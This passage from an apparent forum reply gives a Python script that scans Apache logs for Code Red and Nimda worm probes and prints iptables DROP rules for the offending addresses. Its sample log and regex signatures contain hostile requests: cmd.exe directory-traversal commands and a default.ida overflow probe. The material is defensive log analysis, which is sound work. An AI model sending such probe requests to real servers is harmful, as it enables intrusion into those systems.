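consult hosts.deny, and a DROP (rather than REJECT) sends nothing back, so, as m0rl0ck and paranoid describe, the worm's follow-up requests never reach Apache or the log.

```python
import re
from collections import Counter, defaultdict

# Constructed sample: error_log and access_log lines in the two formats seen
# in this thread. Addresses are taken from the thread; 192.0.2.10 is a benign
# visitor added to show that it is left alone.
SAMPLE_LOG = """\
[Wed Mar 12 00:09:25 2003] [error] [client 24.193.130.183] File does not exist: /apache/technature/html/scripts/root.exe
[Wed Mar 12 00:09:26 2003] [error] [client 24.193.130.183] File does not exist: /apache/technature/html/scripts/..%5c../winnt/system32/cmd.exe
[Wed Mar 12 01:33:37 2003] [error] [client 24.60.246.31] File does not exist: /apache/technature/html/default.ida
24.60.246.31 - - [14/Mar/2003:05:58:34 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 280
24.136.158.105 - - [14/Mar/2003:09:19:52 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
24.136.158.105 - - [14/Mar/2003:09:19:56 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 285
24.101.172.221 - - [14/Mar/2003:06:10:30 -0500] "GET /default.ida?XXXXXXXX%u9090%u6858%ucbd3%u7801 HTTP/1.0" 404 275
192.0.2.10 - - [14/Mar/2003:06:11:00 -0500] "GET /index.html HTTP/1.0" 200 1043
"""

# error_log: "... [client 1.2.3.4] File does not exist: /path"
ERROR_RE = re.compile(r"\[client (?P<ip>[\d.]+)\] File does not exist: (?P<path>\S+)")
# access_log (common/combined): '1.2.3.4 - - [date] "GET /path HTTP/1.0" ...'
ACCESS_RE = re.compile(r'^(?P<ip>[\d.]+) \S+ \S+ \[[^\]]+\] "(?:GET|HEAD|POST) (?P<path>\S+)')

# Assumed signatures: default.ida is the .ida ISAPI target Code Red hits;
# root.exe, cmd.exe under the /c and /d virtual roots, and the ..%5c /
# ..%255c / ..%c0%af style traversals are the Nimda probe set seen above.
SIGNATURES = (
    ("codered", re.compile(r"/default\.ida", re.I)),
    ("nimda", re.compile(
        r"/root\.exe|/winnt/system32/cmd\.exe|\.\.%(25)?(5c|2f|c0%af|c1%1c|c1%9c|c0%2f)",
        re.I)),
)

def parse_line(line):
    """Return (ip, requested path) from either log format, or None."""
    for rx in (ERROR_RE, ACCESS_RE):
        m = rx.search(line)
        if m:
            return m.group("ip"), m.group("path")
    return None

def classify(path):
    """Label a requested path 'codered', 'nimda', or None if benign."""
    for label, rx in SIGNATURES:
        if rx.search(path):
            return label
    return None

def summarize(log_text):
    """Count worm probes per source IP: {ip: Counter({family: n})}.

    IPs that only made benign requests are omitted, which is what keeps a
    later DROP rule from hitting real visitors."""
    hits = defaultdict(Counter)
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if not parsed:
            continue
        ip, path = parsed
        label = classify(path)
        if label:
            hits[ip][label] += 1
    return hits

def iptables_rules(hits, minimum=1):
    """One DROP rule per offending IP, heaviest offender first.

    Only IPs with at least `minimum` probes are included, so a single stray
    request does not earn a block. Rules are returned as strings, not run."""
    ranked = sorted(hits.items(), key=lambda kv: -sum(kv[1].values()))
    return [f"iptables -I INPUT -s {ip} -p tcp --dport 80 -j DROP"
            for ip, c in ranked if sum(c.values()) >= minimum]

if __name__ == "__main__":
    hits = summarize(SAMPLE_LOG)
    for ip, c in sorted(hits.items(), key=lambda kv: -sum(kv[1].values())):
        print(f"{ip:16} {dict(c)}")
    print("\n".join(iptables_rules(hits)))
```

summarize() takes any log text, so feeding it open("/var/log/httpd/error_log").read() gives the same per-IP table for a real log, and raising minimum= drops the one-off probes from the rule list. The rules are only printed; review them before applying, and remember the point made in #8 that a cable-modem address is DHCP-assigned, so a rule that outlives the lease blocks whoever gets that address next.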
 